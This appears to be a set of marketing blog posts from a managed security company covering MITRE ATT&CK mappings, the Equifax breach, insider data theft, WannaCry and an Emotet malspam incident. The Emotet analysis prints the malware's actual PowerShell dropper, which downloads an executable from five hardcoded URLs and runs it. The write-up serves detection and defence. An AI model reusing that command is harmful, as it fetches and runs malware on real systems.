Mapping 'Compromised Insider' Use Case to the MITRE ATT&CK Data Source & Technique

Published: 29th June

If this is one of your use cases, Cyberseer would work with your environment to ensure we have the right data sources to provide visibility of the MITRE techniques.

Hover over each tactic heading to reveal data source & technique:

Initial Access consists of techniques that use various entry vectors to gain their initial foothold within a network.

DATA SOURCES

• Application Log Content
• File Creation
• Network Connection Creation
• Network Traffic Content
• Process Creation
• Application Log Content
• Network Traffic Flow
• Logon Session Creation
• User Account Authentication

MITRE Techniques

•T1566 Phishing
•T1078 Valid Accounts

Execution consists of techniques that result in adversary-controlled code running on a local or remote system.

DATA SOURCES

  • Application Log Content
  • Command Execution
  • Container Creation
  • Container Start
  • File Creation
  • File Modification
  • Image Creation
  • Instance Creation
  • Instance Start
  • Module Load
  • Network Connection Creation
  • Network Traffic Content
  • Process Creation
  • Scheduled Job Creation
  • Script Execution

MITRE Techniques

  • T1059 Command and Scripting Interpreter
  • T1053 Scheduled Task/Job
  • T1204 User Execution
  • T1047 Windows Management Instrumentation

Privilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network.

DATA SOURCES

  • Active Directory Object Modification
  • Command Execution
  • Container Creation
  • File Creation
  • File Metadata
  • File Modification
  • Module Load
  • OS API Execution
  • Process Access
  • Process Creation
  • Process Metadata
  • Scheduled Job Creation
  • User Account Metadata
  • WMI Creation
  • Windows Registry Key

MITRE Techniques

  • T1134 Access Token Manipulation
  • T1068 Exploitation for Privilege Escalation
  • T1055 Process Injection
  • T1053 Scheduled Task/Job
  • T1078 Valid Accounts

Credential Access consists of techniques for stealing credentials like account names and passwords.

DATA SOURCES

  • Application Log Content
  • User Account Authentication
  • Active Directory Object Access
  • Command Execution
  • File Access
  • Network Traffic Content
  • Network Traffic Flow
  • OS API Execution
  • Process Access
  • Process Creation
  • Windows Registry Key Access

MITRE Techniques

  • T1110 Brute Force
  • T1555 Credentials from Password Stores
  • T1557 Man-in-the-Middle
  • T1003 OS Credential Dumping
  • T1558 Steal or Forge Kerberos Tickets

Discovery consists of techniques an adversary may use to gain knowledge about the system and internal network.

DATA SOURCES

  • Asset logon and access
  • Authentication and access management
  • VPN and zero trust network access
  • Application Activity
  • Privileged access management and activity
  • File monitoring
  • Remote logon activity
  • DLP alerts
  • Web activity

MITRE Techniques

  • T1087 Account Discovery
  • T1135 Network Share Discovery
  • T1040 Network Sniffing
  • T1057 Process Discovery
  • T1518 Software Discovery

Lateral Movement consists of techniques that adversaries use to enter and control remote systems on a network.

DATA SOURCES

  • Command Execution
  • File Access
  • Firewall Enumeration
  • Firewall Metadata
  • OS API Execution
  • Process Creation
  • User Account Metadata

MITRE Techniques

  • T1534 Internal Spear phishing
  • T1563 Remote Service Session Hijacking
  • T1021 Remote Services

Exfiltration consists of techniques that adversaries may use to steal data from your network.

DATA SOURCES

  • Cloud Storage Creation
  • Cloud Storage Modification
  • Command Execution
  • File Access
  • Network Connection Creation
  • Network Traffic Content
  • Network Traffic Flow
  • Script Execution
  • Snapshot Creation
  • Snapshot Modification

MITRE Techniques

  • T1048 Exfiltration Over Alternative Protocol
  • T1041 Exfiltration Over C2 Channel
  • T1052 Exfiltration Over Physical Medium
  • T1567 Exfiltration Over Web Service
  • T1537 Transfer Data to Cloud Account

Latest blogs

Securing the Cloud Infrastructure: Native vs Cloud Control

Google Chronicle: The forward-thinking solution for threat hunting

Webinar: Has Google solve Security's big data problem? - Recording

Organisations are challenged by the evolving threat landscape, the requirement to collect and process more security data, and a growing attack surface. In addition, organisations find it difficult to keep up with the operational needs of their cybersecurity analytics and operations technologies while manual processes lead to scalability problems

During this exclusive session, Cyberseer’s Founder, Garath Lauder, will ask some key questions around this world-first technology in cybersecurity powered by Google’s search capabilities.
 
Google’s unique unlimited hot storage model combined with Google’s economies of scale provide significant advantages for organisations, increasing visibility and improving the fidelity of forensic investigations.

So, can Google solve the vast data issue being generated by the security infrastructure?

Interested in a service?

If you would like to know more then you can download a data sheet, white paper, request a demo or get in touch with us!

Infographic: Threats From Within: Five Ways to Boost Your Detection Capability & Capacity

This infographic explores five ways to boost your detection capability and capacity:

  1. Know what to look for
  2. Employ zero trust
  3. Bring in the big guns
  4. Focus on reducing time to detection
  5. Get real-time threat detection

For more insights, read our latest eBook: Threats From Within here.

Many security teams have long feared the worst – that innocent worker can cause as much damage as malicious hackers. And this has often been the case. But whereas breaches in the past may have been the results of clicking a link in a fraudulent e-mail, there is now a far more ominous threat from within: the malicious insider.

Cyberseer Threat Findings Report

Published: 19th February

Keeping your business safe is your number one priority.
It's ours too.

Fusing advanced threat detection technologies with deep forensic expertise, we help you join all the dots to rapidly distel threats. Our innovative solutions give you all the confidence and proactive control you need – whatever comes your way. 

We’re here to help you keep your people and your reputation safe. It’s what we do for companies around the world every day.

With Cyberseer, you’re no longer on your own.

Within this threat findings report we detail some example anomalies detected in customer’s operational environments, where Cyberseer prevented or limited the damage these cyber threats can inflict. Informing customers about relevant threats as early as possible gives them the best chance to proactively address security weaknesses and take actions to prevent data loss, brand damage or system failure.

Complete the short form below to gain access to the full threat findings report.

Request Cyberseer Threat Findings

Latest blogs

Discoveries made by the Cyberseer SOC​

Why is visibility so important in today’s new norm of remote working.

What are Cloud Security and Posture Management tools?

Securing the Cloud Infrastructure: Native vs Cloud Control

Google Chronicle: The forward-thinking solution for threat hunting

Cyberseer Annual Review

Published: 15th February

2020 was a year to remember for all the wrong reasons. Organisations were forced to immediately change to new ways of working and interacting with users and consumers.

In this report, Cyberseer reviews the issues of 2020:

  • Cloud Transformation
  • The Remote Workforce
  • Cybercrime
  • Supply Chain Security

During 2020, there was monumental change both within organisations and how consumers interact with these organisations. Within this paper we review how you can secure the cloud, the remote workforce (those users connecting to the cloud),  how cybercrime has taken advantage of COVID-19 and the increased number of attacks on supply chain security.  Complete the short form below to gain access to the full report.

Request Cyberseer Annual Review

Latest blogs

Discoveries made by the Cyberseer SOC​

Why is visibility so important in today’s new norm of remote working.

What are Cloud Security and Posture Management tools?

Securing the Cloud Infrastructure: Native vs Cloud Control

Google Chronicle: The forward-thinking solution for threat hunting

Why is visibility so important in today’s new norm of remote working?

In the wake of COVID-19 we now have new breeds of remote workers. Businesses have always had a small proportion of remote workers however, pre COVID-19 these were normally field based personnel connecting to specific corporate applications and resources via VPN.

Along with the mass migration of workers to home environments, shortfalls in corporate laptops, PC’s and tablets with which to arm the expanded remote workforce means organisations are relaxing remote working policies to allow the use of personal devices (BYOD), with varying security postures, to access a much broader set of internal corporate applications than ever before. Now, more than ever, it is essential that companies have the ability to identify malicious activity originating from their remote access channels.

The majority of organisations already had varying degrees of remote access monitoring in place. However, these organisations are finding that they have to rapidly scale up their remote access infrastructures to cater for the new normal. 

Rolling out functional SaaS services and VPN connectivity quickly often introduces multiple blind spots that existing solutions weren’t designed to address. This may be a result of using new technologies or simply that the vast increase in traffic has resulted in scaling issues with existing monitoring solutions.

When scaling out infrastructure and applications we need to ensure that we have visibility into these new environments as well as have capacity within existing systems. We therefore need to review and ensure that we ingest the appropriate data sources to provide insights into these environments, as well as ensuring that we have the capacity to store the additional raw data. 

Finally, it is essential that you have an efficient SOC to actively monitor and respond to an increase in alerts.

Watch our webinar to learn more about visibility and click here to learn how ASPECT from Cyberseer can increase your SOC performance and reduce costs.

Published: 8th July

Latest blogs

Discoveries made by the Cyberseer SOC​

Why is visibility so important in today’s new norm of remote working.

What are Cloud Security and Posture Management tools?

Securing the Cloud Infrastructure: Native vs Cloud Control

Google Chronicle: The forward-thinking solution for threat hunting

Who’s Accessing Your Data? This Infographic is a timeline highlighting the cost of the Equifax breach… so far! It has reported clean-up costs of $1.4Billion to date. They received $125 million in cybersecurity insurance reimbursement and the costs continue to rise.

Cyberseer Inforgraphic - Who's Accessing Your Data? - The True Cost of the Equifax Breach...So Far!

Equifax reported 8th September 2017 that 143 million consumer records may have been stolen in a massive global data breach. Data included names, addresses and dates of birth, as well as credit card numbers in a smaller number of cases. With UK consumers, the information which may have been accessed is limited to:

Equifax stated that no UK consumers had residential addresses, passwords or financial data accessed.

The attack occurred between 13th May 2017 through to 29th July 2017. It wasn’t discovered until 29th July 2017.

The UK ICO issued £500,000 fine to Equifax for failing to protect the personal information of up to 15 million UK citizens during the cyber attack in 2017.

The Canadian Office of the Privacy Commissioner has required Equifax’s Canadian division to sign a compliance agreement mandating Equifax submit third-party audit reports on both its security as well as the security of its parent company every two years, for the next six years.

Equifax is paying the ultimate price as its latest figures report a loss of $559.9 million for its first quarter ending March 31st, 2019. The resulting legal costs and investigations haven’t stopped taking a big bite out of the company’s bottom line.

Impact:

Five main factors of the cyber breach:

  1. Identification
  2. Detection
  3. Segmentation
  4. Data Governance
  5. Failure to rate-limit database requests

Failures that led to Equifax breach:

Former CIO reported that had Equifax patched the vulnerability within 2 days of patch release, the breach could have been prevented.

Breach costs may continue and it’s impossible at this time to estimate the additional possible loss in addition to the amount already accrued.

Cyber-attacks of this nature prove the reasons for investing in your security systems and why it’s important to do the basics and maintain them. You may also find Cyberseer’s additional cybersecurity resources below useful:

8 reasons for detecting and investigating a security incident with a Managed Security Service Provider (MSSP) here

Cyberseer – Managed Security Service Partner

 

 

 

8 Reasons for Detecting & Investigating Security Incidents with a Managed Security Provider

The threat landscape is continually evolving affecting all types of business that embrace and rely on technology to continue their day to day operations.


The explosion of cloud-based applications and services coupled with initiatives such as Bring Your Own Device (BYOD) present significant security challenges to the IT Security Department and keep many CISO’s awake at night.

The below graphic has never had more accurate than in today’s digital, always-on world.

Sleeping positions of CEO CIO COO and CISOWhat are the concerns that contribute to making the role of a CISO almost untenable?

  • Increase in disparate log sources that make it challenging for some Analysts to see beyond the noise;
  • Inability to utilise effective contextual enrichment and situational awareness of the current climate;
  • Incomplete enterprise visibility with partial monitoring coverage across some areas;
  • A weak approach to threat hunting to surface anomalous activity earlier in its lifecycle;

Here are 8 critical reasons supporting why utilising an MSSPs can empower your security operations with the people, processes and technology required to take control and reduce dwell time to a minimum for your organisation.

Help ensure your CISO gets some rest and you don’t suffer the consequences of a damaging cyber breach:


1. RISING COST OF BREACHES

£2.7million the average cost of a data breach(Ponemon Institute, 2017 Cost of Data Breach Study).

Immediate disruption is significant! Nearly one-third of data breaches suffered by companies around the world have resulted in someone losing their job, according to a 2018 Kaspersky Lab study.

Not to mention the reputational damage, loss of competitive advantage, erosion of customer confidence, plus higher insurance premiums and regulatory fines.

With rising costs of a cyber-attack, it’s now a boardroom concern.

Utilising an MSSP to proactively monitor your enterprise can help thwart and thus significantly reduce the impact of any attacks targeting your enterprise, be it from internal or external sources.

2. GDPR IMPLICATIONS

GDPR in numbers. The maximum penalty

With the introduction of the EU’s General Data Protection Regulation (GDPR), it’s vital for businesses to pay even closer attention to their data protection strategies.

Organisations are at risk of significant fines if they fail to demonstrate appropriate controls and/or fail to report security breaches to a relevant authority within 72 hours.

To execute notifications of data breaches, organisations must invest in a holistic cybersecurity program.

 The need for improved visibility of data and capability to detect, respond and report breaches is now greater than ever.

An MSSP enables your organisation to align with the control mandates within GDPR and ensure that the risk of financial penalties is reduced significantly.

3. PROTECTING AGAINST MALWARE

It’s important for appropriate controls, such as behaviour-based security solutions to be deployed to accurately detect and respond to attacks before they cause significant damage to your assets and affect your reputation.

Cyberseer utilises behaviour-based endpoint monitoring technology and machine learning to surface anomalous activity swiftly.

4. IMPROVED MONITORING, DETECTION AND RESPONDING TO THREATS

Government research shows that 32% of businesses have experienced a cybersecurity attack in the last 12 months.

(Department for Digital, Culture, Media and Sport, Cyber Security Breaches Survey 2019: Statistical Release).

The threat of a cyber-attack is widespread and real in the UK. It’s now a case of when not if you’ll be targeted. Cybersecurity and how to protect the business are a priority issue.

Cyberseer can challenge and improve your security strategy, protecting your organisation’s assets, customer data and third-parties’ integrations from compromise.

5. MANAGE CLOUD SECURITY

As more and more organisations adopt software as a service and cloud-first initiatives, attackers are following the data.

As a result; Attacks against cloud providers, telecoms, and other organisations with access to large amounts of data have increased.

Cyberseer solutions incorporate log data from your cloud deployments/applications and profile this data alongside your traditional on-premise log data ensuring that complete visibility of your enterprise end to end is achieved irrespective of its location.

6. IT’S BEEN CHALLENGING FOR YOU TO FIND & RETAIN TALENT.

Recent reports estimate that by 2021, a staggering 3.5 million cybersecurity jobs will be available.(Cybersecurity Ventures, Cybersecurity Job Report 2018-2021).

There is a critical talent shortage, and this alone can be a challenge. With a current cybersecurity skills shortage of 2.9 million employees, it’s no wonder that cybersecurity salaries continue to rise.

Utilising an MSSP can help to reduce the operational risk as well as ensure an unfilled vacancy doesn’t affect your front-line defences.

Cyberseer’s approach involves hiring and retaining Tier 3 Forensic Analysts as part of our managed security service team.

7. DECREASE UNNECESSARY COSTS & WASTE WHILST INCREASING EFFICIENCY.

Modern cybersecurity programs are costly to build. It can be expensive to invest in the best-in-class cybersecurity tools alongside costs for the training required for staff to use the new tools.

MSSPs enables organisations to replace large, capital expenditures associated with thus investment with predictable, fixed ongoing operational costs.

Cyberseer adopts a ‘do more with less’ approach utilising next-generation technologies to reduce alert fatigue whilst embracing industry leading forensic analysts to threat hunt, triage and investigate; all encapsulated within an easy to understand user-based license model inclusive of unlimited logging.

8. LACK OF RESOURCES TO MONITOR YOUR SECURITY AT ALL HOURS.

Providing the capability to effectively monitor your enterprise around the clock can become a costly exercise. As a result, many organisations have yielded on this in favour of a 9×5 approach to monitoring.

This presents potential security as adversaries can attack at any time and are not considerate of your active monitoring hours.

Cyberseer provides a 24 x 7 priority threat alerting service as part of the deployed capability.

This service autonomously notifies our analysts of anomalous activity and the Cyberseer enrichment engine starts building up threat intelligence information against individual events within the user or entity timeline to save the analyst time collecting and verifying the data.

This greatly improves the ‘Time to Respond’ (TTR) metrics as well as controlling the volume of human effort that’s required to triage each threat with the same level of accuracy.

PARTNERING WITH AN MSSP LIKE CYBERSEER DELIVERS THE FOLLOWING BENEFITS:

  • Superior protection:
    • with access to the brightest minds and security expertise.
    • 24/7 threat monitoring & alerting.
    • access to the best-in-class cybersecurity technology.
  • Focus in business;
  • Cost savings;
  • Peace of mind;
  • Virtual extension of your IT Security team who are on hand to support you.
  • Superior protection.

Many factors affect the ability for and organisation to remain secure, including an exponential increase in log data due to the adoption of cloud operating models, endpoint monitoring and more reliance being placed on online applications. 

The need to ensure that your team are fully up to date on the latest threat hunting techniques, cyber exploits and vulnerabilities is critical.

To help put this challenge into perspective; it’s been estimated that 90% of all log data globally was generated within the last 24 months.

Utilising this log data effectively to your advantage and identifying malicious activity early is your biggest challenge and best defence against a damaging cyber-attack.

Cyberseer utilise Machine learning technologies from leading security vendors combined with automation and orchestration from Cyberseer’s ASPECT platform (Automated Security Platform Enriching Cyber Threats).

ASPECT enhances and contextualises data and alerts that are notified from monitored devices.

To achieve this ASPECT is able to continually automate and orchestrate security data to provide an enriched contextualised view of security alerts and associated intelligence that enable our analysts to quickly identify and manage threats for your organisation.

The utilisation of ASPECT and our dedicated forensic analysts ensures that, as greater reliance on cloud technologies and disparate operating models becomes more complex, the increased data volumes generated as a result don’t create gaps in visibility.

Detecting Emotet Malspam

Introduction to Emotet Malspam

Recently, one of Cyberseer’s customer’s was hit with a “Malspam” campaign aiming to plant the Emotet malware within its network. 

The original e-mail was sent to a distribution group which quickly escalated the situation. As this was a new campaign for that day, the client’s e-mail gateway had no matching signatures and allowed the malicious e-mail to end up in a number of users’ inboxes.

What is Emotet?

Emotet accounted for 57% of all banking trojan payloads in Q1 2018 [1] with a steady number of infections and daily new campaigns throughout the year. First reported in 2014 as a banking trojan, Emotet has evolved into a malware delivery botnet that takes advantage of social engineering techniques to compromise a machine. 

Infection usually begins with a user being sent a phishing e-mail containing a malicious Word document or a link to a malicious URL. 

Upon opening the malicious document, a combination of obfuscated VBA scripts / macros instructs the target machine to download a remote payload consisting of a number of different modules.Figure 1 - Emotet Activity

Figure 1 – Emotet Activity [2]

Previously downloaded payloads have included:

  • Banking infostealer – Intercepts network traffic from the browser to steal banking details entered by the user.
  • Email client infostealer – Steals e-mail credentials from email client software.
  • Browser infostealer – Steals information stored in browsers such as browsing history and saved passwords.
  • PST infostealer – Reads through Outlook’s message archives and extracts the sender names and e-mail addresses of the messages.

Detection of EmotetFigure 2 Emotet Infection Chain

Figure 2 – Emotet Infection Chain [3]

With the first stage of the attack involving an e-mail attachment, it makes sense to start off by analysing the Word document that landed in the victim’s inboxes.

As stated in the previous section, when a user opens the document and enables macros a VBA scrip runs, we then see the following Powershell command being run to pull files from remote locations:

powershell.exe powershell $fbq=’IkL’;$qdr=‘https://danzarspiritandtruth.com/J7B5TiAIp@https://littlepeonyphotos.ru/jPGDyvIm@https://iuyouth.hcmiu.edu.vn/mVayv0I7S@https://exploraverde.co/mmR4TaGu8@https://turkaline.com/zGiFH0X‘.Split(‘@’);$siF=([System.IO.Path]::GetTempPath()+’\zEl.exe’);$wjS =New-Object -com ‘msxml2.xmlhttp’;$TMS = New-Object -com ‘adodb.stream’;foreach($PJC in $qdr){try{$wjS.open(‘GET’,$PJC,0);$wjS.send();$TMS.open();$TMS.type = 1;$TMS.write($wjS.responseBody);$TMS.savetofile($siF);Start-Process $siF;break}catch{}}

The command contains 5 hardcoded URLs serving a number of different payloads. Connections to these URLs is how the incident was first identified by Cyberseer analysts. 

As soon as the URL was connected to, signatureless models first breached for connections to the domains and then the download of the payload. Taking a step back, these external connections were 100% anomalous for this network environment

Figure 3 - Initial Connections

Figure 3 – Initial connections

Pivoting into the network logs, a quick investigation of the external domains reveals 5 users had become a victim of this attack –

Figure 4 - Devices Associated

Figure 4 – Devices associated

Drilling deeper into the connections from one of the associated devices and looking at a PCAP we can confirm the download of the malicious payloads:

Figure 5 - Executable seen in PCAP

Figure 5 – Executable seen in PCAP

Carving the payloads from the PCAP we get the following exe files –

dd975e74625cdd2959005dc9043f4c26

https://www.virustotal.com/#/file/44504663abd7b411dbd53a5175e71643acac03d85acb0d1c366819925d4aca97/detection

9a2c288270459e95d915b8eaee7f65da

https://www.virustotal.com/#/file/e426afe7129b3e68256b57e62a6e4b76f89a3d7726fba2a99752fce7b8acafad/detection

Cyberseer Analysts were able to rapidly investigate the file and contact the client. Luckily the downloaded executables were unable to execute due to permissions, allowing for them to be successfully quarantined and remediated before a further compromise could occur.

Conclusion

This scenario highlights how traditional signature-based approaches are not enough to adequately defend a network against constantly evolving, new unknown threats. A machine-learnt behavioural approach to security is able to detect threats ahead of other traditional solutions, allowing a faster response to potential breaches. 

Security technologies that require signatures and blacklists to be updated will always be one step behind the attackers and never be able to detect new unknown threats in real-time.

Cyberseer’s threat detection and analysis managed security service bridges the gaps in an organisations cyber defence system. Having the ability to detect and understand the severity of internal and external threats provides effective threat mitigation. 

Understanding your organisation’s threat score and dealing with live issues early, decreases incident response times and significantly reduces the risk of cyber damage.

Insider Data Theft

After a quick browse of cybersecurity headlines, any reader would quickly see the sheer volume of new and evolving threats an organisation may face. Often the biggest threats originate from outside an organisation. However, inside threats should be treated with just as much urgency. 

Whether you are a large, medium or small sized organisation, data theft is a huge problem that needs to be identified as early as possible. Not so long ago an insider data theft breach could be wrapped up and escape news headlines, however with the introduction of GDPR and strict guidelines on reporting such breaches, this is no longer the case.

Insider Data Theft Motive

Motives for insider data theft can range from career development to deliberate theft to cause damage. Intellectual property (trade secrets and financial forecasts) and Personally Identifiable Information (PII) can be extremely valuable to the right buyer. Citing the 2018 Verizon Data Breach Report [1], 76% of data breaches in 2017 were linked to an individual stealing data for financial gain.

Take the following scenario – An employee hands in their resignation, during their notice period they most likely still have access to important systems and file shares to carry out their day to day work. It only takes them a number of minutes to transfer sensitive files to their local machine and then to a USB stick. As an organisation, how can you get the visibility to detect such an event?

Recently at a customer who has deployed an advanced network traffic monitoring solution, Cyberseer’s Analysts noticed an employee connecting to and downloading a large number of files from an internal file share.

Insider Data Theft Blog

Upon alerting the customer, it was revealed that this employee was mid-way through their notice period after recently handing in their resignation. As a figure with a senior position, they had access to business accounts information, contracts and internal payroll data. Stepping back and looking at the incident timeline, it went as follows:

  • Remote user connects to the corporate network via VPN – Their credentials are tracked and out of hours connection is seen as abnormal when compared to user’s daily activity.
  • The user connects to file share – An unusual time for connection to file share when compared to the user’s history.
  • The user begins transferring large numbers of files to the local machine – An unusual amount of data transferred when compared to the user’s history.

When?

Detecting insiders committing data theft in your organisation’s network can be challenging. It’s impossible to get inside the head of your employees and equally as hard to know when they are planning to resign. Rather than waiting to be made aware of a resignation for the employee to become a high risk, think about deploying solutions that provide full visibility into your network and continuously monitor all users and devices to look out for the early signs of compromise.

Sources: [1] – https://www.verizonenterprise.com/resources/reports/rp_DBIR_2018_Report_execsummary_en_xg.pdf

WannaCry continues 21 months later

21 months after WannaCry’s initial discovery, a recent report from Kaspersky Labs has revealed that the WannaCry ransomware is still the most prevalent “crypter” with close to 75,000 users being infected as of Q3 2018, more than double that of its closest rival [1]. More worrying however is that between Q3 of 2017 and Q3 of 2018, the number of WannaCry attacks increased by about two thirds.

Most popular Crypters

Figure 1 – Most popular Crypters [1]

WannaCry spreads via the use of the EternalBlue exploit, a leaked NSA hacking tool that incorporated worm-like capabilities to scan internal devices, exploit them and then install another NSA tool DoublePulsar that acts as a backdoor. The self-propagating nature of the exploit has meant that WannaCry has never slowed down in attempting to spread itself after first being unleashed.

Case Study

Recently a Cyberseer client was unexpectedly hit by the attack. Luckily they were not impacted by the crypter, and the propagation through the network was detected and alerted upon by Cyberseer Analysts.

– Following the initial compromise, a device was seen scanning the network in an attempt to locate other devices open to SMB connections:

Internal SMB connections

Figure 2 – Internal SMB connections

The worm initially scans the network to identify if the DoublePulsar backdoor is already present and if so the ransomware can be dropped. If the backdoor is not found, the EternalBlue exploit is used to infect and then install both WannaCry and the DoublePulsar backdoor. This can be verified by looking at a packet capture of the event:

Device scanning to check if the target windows system already exploited or not

Figure 3 – Device scanning to check if the target windows system already exploited or not

– Exploited devices were then observed scanning both internally and externally on port 445:

 Graph showing spike in external connections and associated model breaches

Figure 4 – Graph showing a spike in external connections and associated model breaches

Quick takeaways

Despite the WannaCry attacks reaffirming the importance of patching, the EternalBlue vulnerability that the ransomware leverages were addressed by Microsoft almost two months before the attack. The unrelenting infections and damage caused demonstrate many organisations are still vulnerable and at risk. Path management is still a key component of an effective security posture, as is the ability to recover lost files should the business be hit by ransomware.

2018 was the year of large-scale data breaches as visualised in the Cyberseer Infographic: 2018 Breach Highlights.

So, what can we expect to see in the cyber security space in the coming year? 2019 is guaranteed to be filled with new attack techniques. As you think about how to protect your organisation, here’s an infographic of the 2019 Cyber Security Trends and Expectations we believe are in store for 2019 and beyond.

Infographic 2019 cyber security trends and expections

In summary, in 2019 we can expect to see the following cyber security trends and expectations:

 

A day in the life a Cyber Security Analyst

Regardless of the specific role of a professional working in cyber security, the day that lies ahead is unlikely to follow a generic 9 to 5 pattern. The unpredictable nature of the ever-evolving threat landscape can mean everything is quiet until it is not.

Even before arriving into the office, the morning commute usually consists of reading the latest news, blogs and write-ups of newly discovered threats. Each of these potentially providing insight into new techniques that need to be defended against.

Once sat and logged in, the first task is to review and triage the potential threats that have been generated overnight for those clients who have not opted into a 24×7 service. Aided by machine learning tools, the usual noise and false positives that are commonly seen with traditional tools are gone and the cyber security analyst is presented meaningful output. 

Depending on the outcome of the triage process it will either be dismissed as benign or an incident report prepared and escalated to the affected party. Following acknowledgement of receiving the sent report by a client, the analyst will work in liaison with their team to diagnose the infection and ensure successful containment.

Moving forward the cyber security analyst will continue to monitor newly generated threats and go through the correct escalation process if needed. If a threat needs to be escalated, they are required to aid in a further investigation in order to determine how the threat was delivered on the network; not only this, but it also gives an opportunity for an analyst to advise the client on remediation. 

Analysts will work and edit rulesets and prioritise devices in order to quickly identify further anomalous activity. Doing so, helps and analyst keeps an eye on affected devices and ensure there is no indication of further activity. The cyber security analyst is involved in the whole process from start to finish.

Whilst generated alerts are a passive method of analysis, another aspect of an cyber security analyst’s day is proactive threat hunting – the active pursuit of anomalies on servers, endpoints and network traffic that may be a sign of compromise.

Understanding a client’s unique set of risks and requirements ensures that an analyst can prioritise where to focus their threat hunting abilities. This combination of prioritised risk, threat intelligence and a good understanding of adversaries Tactics, Techniques and Procedures (TTP) mean an analyst can splice datasets and reveal insights with the least possible effort.

As the day moves on, downtime allows for the cyber security analyst to take a step back from client systems and spend time experimenting, analysing malware samples and testing new tools that can be integrated into their workflow to further improve day to day activities.

If you are interested in learning more about our cyber security analysts operating our managed security service, please reach out to our team of experts at [email protected]